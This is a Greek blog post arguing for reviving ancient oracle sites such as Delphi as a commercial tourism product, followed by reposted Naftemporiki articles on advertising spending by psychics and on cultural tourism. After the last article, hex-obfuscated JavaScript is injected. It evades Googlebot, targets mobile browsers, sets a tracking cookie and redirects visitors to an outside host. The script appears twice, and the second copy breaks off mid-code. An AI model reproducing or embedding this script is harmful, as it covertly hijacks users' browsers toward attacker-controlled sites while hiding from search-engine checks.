anwnymous

Μαΐου 23, 2010

Το βαρύ πυροβολικό της χώρας είναι ο πολιτισμός.(850 λέξεις)

Filed under: Uncategorized — thelastrealanwnymous @ 11 :42 πμ

          Πρόκειται για ένα πρωτότυπο τουριστικό προϊόν. Δεν συζητήθηκε ποτέ μέχρι σήμερα και δεν το εμπορεύτηκε κανείς άλλος, ούτε κράτος ούτε ιδιώτης. Έχει όλα τα στοιχεία του απόλυτου προϊόντος. Λειτουργεί ανεξαρτήτως σεζόν , πράγμα που λύνει το πρόβλημα της περιορισμένης καλοκαιρινής σεζόν στη χώρα μας. Έχει διαχρονική ζήτηση και ο πελάτης γνωρίζει εκ των προτέρων ότι πρέπει να πληρώσει για να το αποκτήσει . Η αξία του δεν αμφισβητείται.

           Ας πάρουμε όμως τα πράγματα από της αρχή. Ζούμε στην εποχή της πληροφορίας. Οι υπολογιστές έχουν μπει πλέον από καιρό στη ζωή μας χωρίς να καταφέρουν να λύσουν το πρόβλημα της παραγωγικότητας στη χώρα μας.

          Είπα «εποχή της πληροφορίας»; Μάλλον ξεπερασμένος μου φαίνεται αυτός ο προσδιορισμός. Αν κρίνουμε από τα μοντέρνα οικονομικά προϊόντα που δεν κατάφεραν να τα αφομοιώσουν ούτε οι οικονομολόγοι μας , τότε πρόκειται για την εποχή της πρόβλεψης. Το ξέρετε ότι όλα αυτά τα πολύπλοκα ομόλογα με την μεγάλη μόχλευση (τεράστιο κέρδος σε σχέση με το επενδυόμενο ποσόν ) μοιάζουν πάρα πολύ με το «πάμε στοίχημα»;

         Όποιος μπορεί λοιπόν να κάνει προβλέψεις σήμερα , κερδίζει. Γύρω από τις προβλέψεις υπάρχει και το ρίσκο – μάλλον η ανάληψη κινδύνου όπως λέγεται στα χρηματιστήρια – η στατιστική , τα μαθηματικά μοντέλα που χρησιμοποιούν οι μετεωρολόγοι , τα ντίλινγκ ρουμς των τραπεζών , οι εκτιμήσεις των μεγάλων οίκων αξιολόγησης , τα επιτόκια , ο δανεισμός και όλα αυτά τέλος πάντων τα σημαντικά θέματα  που εισέβαλαν στη ζωή μας αυτό τον καιρό.

       Στη χώρα μας το θέμα της πρόβλεψης δυστυχώς αντιμετωπίζεται φαιδρά και συνήθως σχετίζεται με τα σχήματα στο κατακάθι του ελληνικού καφέ.   

           Αν κοιτάξουμε την ιστορία μας – το ένδοξο παρελθόν όπως ειρωνικά πλέον αποκαλείται – πριν από κάθε μεγάλο γεγονός , υπάρχει η άποψη των μαντείων για την έκβασή του. Κανείς δεν αμφισβήτησε τη δύναμή τους συμπεριλαμβανομένων και προσωπικοτήτων όπως ο Σωκράτης , ο Αλέξανδρος , ο Δαρείος. Και κυρίως μη ξεχνάτε το «περιτύλιγμα» . Τα μαντεία δεν ήταν απλά και μόνον προβλέψεις , αλλά και χώροι λατρείας , αγώνων (αθλητισμός) και  πολιτισμού.

           Η φθίνουσα πορεία τους στους Ρωμαϊκούς και Βυζαντινούς χρόνους και η λήθη των αιώνων, περιόρισαν τη λάμψη τους και απομάκρυναν από τις συνειδήσεις , ακόμη και των πιο τολμηρών και των πιο αδίστακτων , ανθρώπων με επενδυτικά ενδιαφέροντα την πιθανότητα να τα αναβιώσουν.

           Αν κρίνουμε από το μαντείο των Δελφών , η γεωγραφική του θέση και ο ρόλος της Στερεάς Ελλάδας στην επανάσταση του ΄21 παραπέμπουν  περισσότερο στην εποχή και τα γεγονότα του 1800 παρά στην αρχαιότητα . Δηλαδή ο παράγοντας επιβίωσης του έθνους στη σκλαβιά , επικάλυψε κάθε άλλο σημαντικό ιστορικό ρόλο της περιοχής. Όμως ασχέτως της δικής μας στάσης απέναντι στα μαντεία ,οι ξένοι  ακόμη και οι σύγχρονες εταιρείες υπολογιστών δεν αμφισβητών την δύναμη  των λέξεων  όπως : DELFI , ORACLE…που τα έχει συνηθίσει το μάτι μας να συνυπάρχουν με τους υπολογιστές αλλά είναι ελληνικά δημιουργήματα και αναφέρονται στην ικανότητα πρόβλεψης.

         Δεν θα επεκταθώ άλλο , απλά θα θέσω το ερώτημα : Τι είναι αυτό που μπορεί να εμφυσήσει ζωή στα μουσεία , στα ερείπια των ναών , στους αρχαιολογικούς χώρους , σε όλα αυτά τα απομεινάρια της ιστορίας μας ; Τι μπορεί να τα κάνει να ζωντανέψουν και να λειτουργήσουν με σύγχρονο τρόπο και κυρίως να είναι αποδοτικά οικονομικά; 

           Η απάντηση είναι Η επαναλειτουργία των μαντείων.  

        Ενδεχομένως αυτό να ήταν το στοιχείο που έλειπε από την απόπειρα του Άγγελου Σικελιανού να αναβιώσει το Δελφικό πνεύμα το 1930. Ο κόσμος ζητάει κάτι πιο χειροπιαστό από  το μεγαλείο του αρχαίου κόσμου. Ζητάει κάτι που να το κατανοεί και να το θαυμάζει. Ο επισκέπτης από το εξωτερικό θα δει τους ναούς , τα μουσεία , μια  παράσταση αρχαίας τραγωδίας  πιθανώς,  αλλά θα ζητήσει και ένα χρησμό για τον ίδιο , την οικογένεια του ή την επιχείρησή του. Ακριβώς αυτό το τελευταίο ενώνει τον κομμένο ομφάλιο λώρο μας με την αρχαιότητα και με την ιστορία μας.

        Νομίζω λοιπόν πως η λύση στο πρόβλημα της χώρας είναι η ενδοσκόπηση. Πως μπορεί να λειτουργήσει ένας θεσμός μαντείων σήμερα;

           Κατανοώ ότι δημιουργείται καταιγισμός ερωτηματικών. Το θέμα θα προχωρήσει με την χορήγηση κρατικών αδειών , σε μεγάλες ιδιωτικές εταιρείες (ας τις ονομάσουμε εταιρείες προβλέψεων)  περίπου με τον ίδιο τρόπο που δόθηκαν στα καζίνα. Τα ίδια τα αρχαία κτίρια των μαντείων μπορούν να παραμείνουν σε λειτουργία εν είδη ατραξιόν , που θα χορηγούν κομψούς παπύρους με ατομικούς χρησμούς για τον επισκέπτη. ( Το έχουμε δει να λειτουργεί στη χαριτωμένη συνήθεια των κινέζικων μπισκότων.) Εδώ κρίνω σκόπιμο στο περιεχόμενο να χρησιμοποιηθούν στίχοι ελλήνων ποιητών.   

          Μία ματιά στο σήμερα μας δηλώνει ότι οι πλέον διαφημιζόμενες επιχειρήσεις σήμερα στη χώρα μας είναι τα μέντιουμ. Χωρίς περισσότερα λόγια το συμπέρασμα είναι ότι υπάρχει ζήτηση.(***** ακολουθούν  επίσημα στατιστικά στοιχεία)       

         Δυστυχώς λείπει από την αναπαράσταση αρχαίων έργων τέχνης αυτό το κάλτ στοιχείο που θα τα κάνει δημοφιλή στο ευρύτερο κοινό. Και η απάντηση είναι αυτή. Μόνο η διαχείριση των χώρων που είναι ήδη γνωστά παγκοσμίως σαν αρχαία μαντεία , μόνο η παρουσίασή τους ως εμπορευματοποιημένο προϊόν μπορεί να ξαναφέρει τον τουρίστα στη χώρα με ανυπολόγιστου ύψους  έσοδα.

         Περισσότερες λεπτομέρειες στο βιβλίο μου «Το Δήλιο πρόβλημα» που βρίσκεται ήδη στις εκδόσεις Μίνωας. 

*

Ρεκόρ από τα μέντιουμ
17 November 2005 07:00
http://www.naftemporiki.gr/news/static/05/11/17/1120499.htm
ΤΑ…μέντιουμ είναι ο μεγαλύτερος διαφημιζόμενος στα ΜΜΕ, αφού τον περασμένο μήνα ξεπέρασαν σε διαφημιστική δαπάνη ακόμη και τα κονδύλια των εταιρειών τηλεπικοινωνιών.
Αυτό προκύπτει από τα στοιχεία της εταιρείας Media Services για το μήνα Οκτώβριο, στα οποία φαίνεται ότι το κονδύλι αυτό δεν κατευθύνεται προς την τηλεόραση, η οποία αρκετές φορές έχει κατηγορηθεί για τέτοιου είδους διαφημίσεις, αλλά στα έντυπα, κατά κύριο λόγο στα περιοδικά και λιγότερο στις εφημερίδες.
Το ποσό του 1,488 εκατ. ευρώ δαπάνησαν τα μέντιουμ για διαφημιστική προβολή τον Οκτώβριο. Απ’ αυτά, το 1,39 εκατ. ευρώ πήραν τα περιοδικά και 92.000 ευρώ οι εφημερίδες.
Στη δεύτερη θέση είναι η Cosmote με 1,484 εκατ. ευρώ και ακολούθησαν οι ΤΙΜ με 1,42 εκατ. ευρώ, η Vodafone με 1,41 εκατ. ευρώ και τα καταστήματα Γερμανός με 1,34 εκατ. ευρώ.
Α ξίζει να αναφερθεί ότι σε υψηλά επίπεδα κυμαίνονται τα «έξοδα προβολής» των μέντιουμ και σε επίπεδο 10μηνου.
Ειδικότερα και όπως προκύπτει πάντοτε από τα στοιχεία, στο διάστημα από τον Ιανουάριο του 2005 μέχρι και τον Οκτώβριο η διαφημιστική δαπάνη των μέντιουμ ξεπέρασε τα 9,15 εκατ. ευρώ. πράγμα που φέρνει τους «σύγχρονους μάντες» στην τρίτη θέση του πίνακα με τους σημαντικότερους διαφημιζόμενους του έτους.
Και από το ποσό αυτό τη μερίδα του λέοντος παίρνουν τα περιοδικά με 8,15 εκατ. ευρώ, ενώ οι εφημερίδες απορροφούν το ποσό των 998.000 ευρώ.

(c) 2005, ΝΑΥΤΕΜΠΟΡΙΚΗ –  Π. ΑΘΑΝΑΣΙΑΔΗΣ & ΣΙΑ Α.Ε.

*

Ποιοι και πού ξόδεψαν τα περισσότερα για προβολή
Η ΝΑΥΤΕΜΠΟΡΙΚΗ
Πέμπτη, 1 Φεβρουαρίου 2007 07:00
323 λέξεις, ΜΕΣΑ ΑΠΟ ΤΑ ΜΕΣΑ
URL: http://www.naftemporiki.gr/news/redirstory.asp?id=1296383
Ο ΧΩΡΟΣ των μηχανοκίνητων αλλά και οι… «απόγονοι του Τειρεσία» ήταν και το 2006 οι σημαντικότεροι διαφημιζόμενοι στα ΜΜΕ, ρίχνοντας βεβαίως το μεγαλύτερο μέρος των διαφημιστικών τους κονδυλίων στα περιοδικά. Χαρακτηριστικό της κατανομής των διαφημιστικών κονδυλίων για το 2006 είναι το ότι η τηλεόραση, αλλά και το ραδιόφωνο, δεν πήραν τίποτα από τους τέσσερις μεγαλύτερους διαφημιζόμενους στα ΜΜΕ.
Οι διάφορες αντιπροσωπείες αυτοκινήτων πήραν φέτος με πολύ μικρή διαφορά, τα σκήπτρα του «πρωταθλητή», όσον αφορά τα διαφημιστικά έξοδα στα ΜΜΕ από τα μέντιουμ, αφού η συνολική τους δαπάνη ανήλθε σε 19,70 εκατ. ευρώ, ενώ εκείνη των μέντιουμ σε 19,2 εκατ. ευρώ, έχοντας βεβαίως ως κύριο διαφημιστικό όχημα τα περιοδικά.
Η αύξηση των δαπανών του μέσου Ελληνα για αυτοκίνητο -συνέπεια της εύκολης χρηματοδότησης- αλλά και η εμφάνιση περισσότερων ειδικών περιοδικών σχετικών με το χώρο, οδήγησε το 2006 τις αντιπροσωπείες αυτοκινήτων σε έξοδα-ρεκόρ για την προβολή των προϊόντων τους.
Έτσι από τα 19,7 εκατ. ευρώ που δαπανήθηκαν συνολικά, τα 18,74 εκατ. ευρώ απορροφήθηκαν από τα περιοδικά και μόλις οι 961 χιλιάδες ευρώ πήγαν στις εφημερίδες.
Τα μέντιουμ με συνολική δαπάνη 19,2 εκατ. ευρώ έδωσαν τα 17,05 εκατ. ευρώ στα περιοδικά αλλά και 2,14 εκατ. ευρώ σε εφημερίδες, αφού τα φύλλα που μπορούν -από πλευράς θεματολογίας και απευθυνόμενου κοινού- να δεχθούν τέτοιου είδους διαφημίσεις αυξάνονται ολοένα και περισσότερο.
Σημαντική, με κατανομή ανάλογη του πρώτου -πράγμα αναμενόμενο αφού πρόκειται για «συγγενή χώρο»-, ήταν και η δαπάνη των διαφόρων καταστημάτων αξεσουάρ και ανταλλακτικών αυτοκινήτων, η οποία ανήλθε σε 15,37 εκατ. ευρώ, φέρνοντας το συγκεκριμένο διαφημιζόμενο στην τρίτη θέση της λίστας. Από το ποσό αυτό τα 15,2 εκατ. ευρώ πήγαν στα περιοδικά και οι 171 χιλιάδες ευρώ στις εφημερίδες.
Στην τέταρτη θέση βρίσκονται τα διάφορα καταστήματα εμπορίας δικύκλων, χώρος του οποίου οι πωλήσεις αναπτύσσονται ραγδαία και κατά συνέπεια και τα έξοδα διαφημιστικής προβολής. Το συνολικό ποσό της κατηγορίας ανήλθε σε 10,93 εκατ. ευρώ και από αυτό, τα 10,78 εκατ. ευρώ πήγαν στα περιοδικά και μόλις οι 148 χιλιάδες ευρώ στις εφημερίδες.

*

Τουρισμός και πολιτισμός εφαλτήρια ανάπτυξης
14 November 2005 07:00
http://www.naftemporiki.gr/news/static/05/11/14/1119137.htm

Η ΕΥΡΩΠΑΪΚΗ Οικονομική και Κοινωνική Επιτροπή είναι ένα από τα βασικά θεσμικά όργανα των Ευρωπαϊκών Κοινοτήτων και αποτελεί ισχυρό βήμα των κοινωνικών εταίρων, όταν επιθυμούν να προβάλλουν το δικό τους όραμα, στην κεντρική σκηνή των Βρυξελλών. Τα τελευταία χρόνια λοιπόν, η ΕΟΚΕ προωθεί σημαντικές πρωτοβουλίες στον τουριστικό τομέα.
Η νέα όμως πρωτοβουλία της στον τομέα αυτό, πηγαίνει ένα βήμα πιο μπροστά, σε κατεύθυνση μάλιστα που ενδιαφέρει απολύτως τη χώρα μας, δηλαδή προβάλλει τον «πολιτισμικό» τουρισμό, ζητώντας από τα υπόλοιπα θεσμικά όργανα της Ε.Ε., και κυρίως την Κομισιόν και το Συμβούλιο, να υιοθετήσουν πολιτικές ενίσχυσης της κατηγορίας αυτής οικονομικών δραστηριοτήτων.
Βέβαια οι πρωτοβουλίες της ΕΟΚΕ δεν έχουν αποφασιστικό χαρακτήρα. Αποτελούν ωστόσο, ένα ισχυρό ερέθισμα για τα υπόλοιπα θεσμικά όργανα. Αν μάλιστα οι προτάσεις αυτές υποστηριχθούν από κράτη μέλη, τότε είναι πολύ πιθανό να κινητοποιηθούν και τα αποφασιστικά όργανα της Ένωσης όπως η Κομισιόν και το Συμβούλιο.
Η νέα πρωτοβουλία ονομάζεται «Τουρισμός και πολιτισμός: Δύο δυνάμεις ανάπτυξης». Όπως αναφέρουν άριστα ενημερωμένοι κύκλοι των Βρυξελλών, η νέα πρωτοβουλία προωθείται έντονα από την Ιταλία. Γιατί όχι λοιπόν και από την Ελλάδα.
Ας μη ξεχνάμε, ότι σε κοινοτικό επίπεδο, οι χώρες που έχουν την πρωτοβουλία της προώθησης μιας νέας πολιτικής, είναι συνήθως και οι περισσότερο ωφελημένες από αυτή, όταν θα έρθει η στιγμή να κατανεμηθούν οι πόροι που θα διαθέσει η Ένωση για τη σχετική στήριξη.
Και μάλιστα στη σημερινή Ευρώπη των περιφερειών, η πρωτοβουλία «Τουρισμός και πολιτισμός: Δύο δυνάμεις ανάπτυξης», μπορεί να υιοθετηθεί από συγκεκριμένες περιφέρειες των κρατών μελών, που διαθέτουν ισχυρό «πολιτισμικό» κεφάλαιο.
Για παράδειγμα η ιταλική περιφέρεια του Σαλέρνο διοργανώνει ήδη Δημόσια Διαβούλευση για το θέμα αυτό την τρέχουσα εβδομάδα. Γιατί όχι και κάποιες ελληνικές περιφέρειες; Και αν η Ιταλία ενδιαφέρεται να προωθήσει το «πολιτιστικό προϊόν» της, γιατί όχι και η χώρα μας;
Στόχος θα είναι, σύμφωνα με την ΕΟΚΕ, η προώθηση του ευρωπαϊκού τουρισμού με ειδική έμφαση στον «πολιτισμικό  τουρισμό», που καταγράφει και τους υψηλότερους ρυθμούς ανάπτυξης  στον τομέα. ?λλωστε οι εκπρόσωποι του τομέα στην Ευρώπη συμφωνούν, ότι το ευρωπαϊκό τουριστικό προϊόν μπορεί και πρέπει να επανατοποθετηθεί στην παγκόσμια αγορά, σε συνδυασμό με τον πολιτισμό.

* Αστείρευτη πηγή πλούτου ο πολιτισμός
Η ΝΑΥΤΕΜΠΟΡΙΚΗ
Πέμπτη, 16 Νοεμβρίου 2006 07:00
274 λέξεις, ΑΓΟΡΕΣ
URL: http://www.naftemporiki.gr/news/redirstory.asp?id=1266079
ΜΙΑ ΙΔΙΑΙΤΕΡΩΣ ενδιαφέρουσα έρευνα δημοσίευσε χθες η Ευρωπαϊκή Επιτροπή σχετικά με τα οικονομικά του πολιτισμού, με κύριο εύρημα ότι ο τομέας συμβάλλει με 2,6% του ΑΕΠ στις 25 χώρες της Ε.Ε. Λεπτομέρειες δημοσιεύονται σήμερα σε άλλες στήλες της «Ν».

Δυστυχώς λοιπόν η χώρα μας, εμφανίζεται στο σχετικό πίνακα μόνο με 1% του ΑΕΠ να προέρχεται από το συναρπαστικό αυτό τομέα, ενώ κατά μέσο όρο στη δυτική Ευρώπη, οι χώρες μέλη της Ε.Ε. οφείλουν 2% με 3% του δικού τους ΑΕΠ, στον πολιτισμό.

Στην κορυφή του πίνακα εμφανίζονται φυσικά η Γαλλία, με πολιτιστικό προϊόν 3,4% του ΑΕΠ και η Βρετανία με 3%. Η συνολική απασχόληση στον πολιτιστικό τομέα στην ΕΕ-25 ανέρχεται σε 5,8 εκατομμύρια άτομα και το πλέον ενδιαφέρον είναι, ότι ο αριθμός τους αυξάνεται ταχύτατα.

Όσον αφορά την προστιθέμενη αξία ο πολιτισμός παράγει περισσότερο προϊόν από τον τομέα τροφίμων-ποτών-καπνού (1,9% του ΑΕΠ)…«Ουκ έπ’ άρτω μόνον ζήσεται άνθρωπος».

Στο σημείο αυτό θα πρέπει να αναφέρουμε, ότι πρόκειται για τις πωλήσεις που πραγματοποιεί ο τομέας του πολιτισμού και για τα εισοδήματα που έχουν παραχθεί στους υποκλάδους των καλών τεχνών, της φωτογραφίας, του σχεδίου (μόδα, κατασκευές, βιομηχανία), των παραστατικών τεχνών (θέατρο, χορός, μελόδραμα, τσίρκο), της πολιτιστικής κληρονομιάς (μουσεία, γκαλερί, βιβλιοθήκες, αρχαιολογικοί χώροι), της έβδομης τέχνης, των γραφικών τεχνών και των εκδόσεων, του βίντεο, της τηλεόρασης και του ραδιοφώνου, της αρχιτεκτονικής και της διαφήμισης.

Πρόκειται πράγματι για εντυπωσιακή απαρίθμηση κλάδων οικονομικών δραστηριοτήτων, που δυνητικά ο καθένας τους αποτελεί ολόκληρη «βιομηχανία» και μάλιστα με υψηλή προστιθέμενη αξία και τεχνολογία, όπου οι ευρωπαϊκές χώρες διαθέτουν σημαντικό συγκριτικό πλεονέκτημα σε σύγκριση με όλο τον υπόλοιπο κόσμο. Τις τεράστιες και αειφόρες δυνατότητες του πολιτισμού, είναι καιρός να εκτιμήσουμε και στη χώρα μας.

*

Η σημασία του τουριστικού τομέα
Η ΝΑΥΤΕΜΠΟΡΙΚΗ
Τετάρτη, 1 Νοεμβρίου 2006 07:00
370 λέξεις, ΑΓΟΡΕΣ
URL: http://www.naftemporiki.gr/news/redirstory.asp?id=1260603
Η ΟΙΚΟΝΟΜΙΑ φαίνεται να εισέρχεται, επιτέλους, σε φάση μιας μεσο-μακροπρόθεσμης περιόδου οικονομικής ανόδου με σημαντικές συμβολές από την κοινοτική πλευρά, αλλά και την νεκρανάσταση του τουρισμού, των εξαγωγών αγαθών και των επιχειρηματικών επενδύσεων, επισημαίνει το Ινστιτούτο Τουριστικής Έρευνας και Προβλέψεων.
Για να υπάρξει όμως συνέχεια θα πρέπει όλοι οι παράγοντες να συμβάλλουν προς την κατεύθυνση βελτίωσης των οικονομικών δεικτών και κυρίως οι κοινωνικοί φορείς. Δεδομένης και της εξειδικεύσεως του Ινστιτούτου σε θέματα τουριστικής πολιτικής, η πρόβλεψη για άνοδο των επισκεπτών από την αλλοδαπή κατά 8% κατά το επόμενο έτος κρίνεται ρεαλιστική και επιτεύξιμη αρκεί να μην υπάρξει απώλεια στην ανταγωνιστικότητα του τουριστικού προϊόντος.

Η ανταγωνιστικότητα δεν έγκειται μόνο και μόνο στο θέμα του κόστους αλλά και στην ποιότητα και στην εξυπηρέτηση ή υπό την ευρεία έννοια, την φιλοξενία. Όλες οι χώρες της περιοχής μας επιδιώκουν να αυξήσουν το μερίδιό τους στην τουριστική αγορά και συνεπώς και αυτές θα επιδιώξουν να γίνουν ανταγωνιστικές.
Ο συναγωνισμός θα είναι έντονος και συνεχής ενώ τα μέσα υλοποίησης του στόχου, θα διευρυνθούν. Πάντως οι επικρατούσες οικονομικές συνθήκες και τάσεις της παγκόσμιας οικονομίας, ιδίως δε των ευρωπαϊκών χωρών, διαμορφώνουν ευνοϊκό πλαίσιο για τη συνέχιση της διαστολής της τουριστικής δραστηριότητας, με ρυθμό παρεμφερή προς εκείνο του τρέχοντος έτους.
Στον τομέα αυτό η χώρα μας έχει ιδιαίτερες επιτυχίες και στο παρελθόν, αλλά δεν φθάνει μόνο αυτό. Όπως εύστοχα αναφέρεται στη σχετική μελέτη του Ινστιτούτου, επιτυχής τουριστική πολιτική και ανάπαυση επί των δαφνών της επιτυχίας αποτελούν έννοιες αντιφατικές.
Ό,τι και αν έχει συμβεί, η επίδοση της Ελλάδος αποτελεί πηγή αισιοδοξίας και αυξάνει τις υποχρεώσεις της χώρας για μεσο-μακροπρόθεσμη διατήρησή της. Αυτό δε είναι λάθος να ερμηνευθεί ότι μπορεί να επιτευχθεί μόνο με συνέχιση της προβολής και διαφημίσεως της χώρας.
Όπως από έρευνες έχει προκύψει, υψηλό ποσοστό των επισκεπτών δηλώνει ότι περί της τουριστικής Ελλάδος έλαβε γνώση από φίλους ή συγγενείς ή γείτονες. Η ικανοποίηση, επομένως, των επισκεπτών σε όρους εκπληρώσεως προσδοκιών, αποτελεί λυδία λίθο για τη διατήρηση αλώβητης της τουριστικής φήμης της χώρας και περαιτέρω αναβαθμίσεώς της.
Ο τουρισμός αποτελεί μια δραστηριότητα που μπορεί να διαδραματίσει σημαντικό ρόλο στην επίτευξη των στόχων της στρατηγικής για την οικονομική μεγέθυνση και τη δημιουργία θέσεων εργασίας. Στόχος ευρωπαϊκός, αλλά και ελληνικός. Υπάρχουν οι δυνατότητες και τα εχέγγυα για ένα καλό αποτέλεσμα.var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 